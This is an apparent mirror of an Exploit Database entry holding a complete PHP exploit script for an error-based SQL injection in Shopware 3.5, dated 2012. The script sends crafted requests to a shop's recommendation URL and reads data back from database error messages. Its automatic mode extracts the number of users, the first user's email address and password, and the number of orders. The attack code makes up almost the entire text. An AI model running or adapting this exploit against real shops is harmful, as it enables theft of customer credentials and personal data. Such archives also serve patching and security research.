Shopware 3.5 – SQL Injection

• Exploit Database
• 23 阅读

• 作者： Kataklysmos
  日期： 2012-07-14
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/19825/

• #!/usr/bin/php
  <?php
  
  #Exploit Title: Shopware 3.5 - SQL Injection
  #Date: 13.07.2012
  #Exploit Author: Kataklysmos
  #Software Link: http://www.shopware.de/
  #Version: 3.5
  
  
  function http_req($host, $q)
  {
  if(!$fs = fsockopen($host, 80))
  exit("Could not open HTTP- Connection to ".$host."\r\n\r\n");
  
  $head= "GET /recommendation/bought/article/".urlencode("0 AND (SELECT 1 FROM (SELECT COUNT(*), CONCAT((SELECT (".$q.") FROM `information_schema`.`tables` LIMIT 0,1), FLOOR(RAND(0)*2)) x FROM `information_schema`.`tables` GROUP BY x) z)")." HTTP/1.1\r\n";
  $head .= "Host: ".$host."\r\n";
  $head .= "Connection: Close\r\n\r\n";
  
  fwrite($fs, $head);
  
  $ret = '';
  while(!feof($fs))
  $ret .= fgets($fs, 4096);
  fclose($fs);
  
  return $ret;
  }
  
  function mask($cont)
  {
  if(preg_match('/Duplicate entry \'(.*)1\' for/', $cont, $m))
  return $m[1];
  else
  return false;
  }
  
  function space($x)
  {
  $r = '';
  for($i = 0; $i < $x; $i++)
  $r .= ' ';
  return $r;
  }
  
  echo "\r\nExploit Title: Shopware 3.5 - SQL Injection\r\n";
  echo "Date: 13.07.2012\r\n";
  echo "Exploit Author: Kataklysmos\r\n";
  echo "Software Link: http://www.shopware.de/\r\n";
  echo "Version: 3.5\r\n\r\n";
  
  if(!isset($argv[2]))
  {
  echo "Usage: \r\n";
  echo "".$argv[0]." HOST --auto\r\n";
  echo "".$argv[0]." www.shopwaredemo.de --auto\r\n\r\n";
  echo "".$argv[0]." HOST QUERY\r\n";
  echo "".$argv[0]." www.shopwaredemo.de \"SELECT COUNT(`id`) FROM `s_user`\"\r\n";
  echo "".$argv[0]." www.shopwaredemo.de \"SELECT `email` FROM `s_user` LIMIT 0,1\"\r\n\r\n";
  exit(1);
  }
  
  if($argv[2] != '--auto')
  {
  $x = http_req($argv[1], $argv[2]);
  
  if(!$x = mask($x))
  exit("Your query failed!\r\n\r\n");
  
  echo "Query:\r\n".$argv[2]."\r\nReturn:\r\n".$x."\r\n\r\n";
  }
  else
  {
  $task = array(array('Amount of registered users', 'SELECT COUNT(`id`) FROM `s_user`', null),
  array('E- Mail from first user', 'SELECT `email` FROM `s_user` ORDER BY `id` LIMIT 0,1', null),
  array('Password from first user', 'SELECT `password` FROM `s_user` LIMIT 0,1', null),
  array('Amount of orders', 'SELECT COUNT(`id`) FROM `s_order`', null)
  );
  
  for($i = 0; $i < count($task); $i++)
  {
  echo "[ .. ] Task: \"".$task[$i][0]."\"";
  
  $x = http_req($argv[1], $task[$i][1]);
  if(!$x = mask($x))
  echo "\r[fail] Task: \"".$task[$i][0]."\"\r\n";
  else
  {
  echo "\r[ ok ] Task: \"".$task[$i][0]."\"\r\n";
  $task[$i][2] = $x;
  }
  }
  echo "\r\n";
  
  for($i = 0; $i < count($task); $i++)
  echo $task[$i][0].space(26-strlen($task[$i][0])).' : '.$task[$i][2]."\r\n";
  
  echo "\r\n";
  }
  
  ?>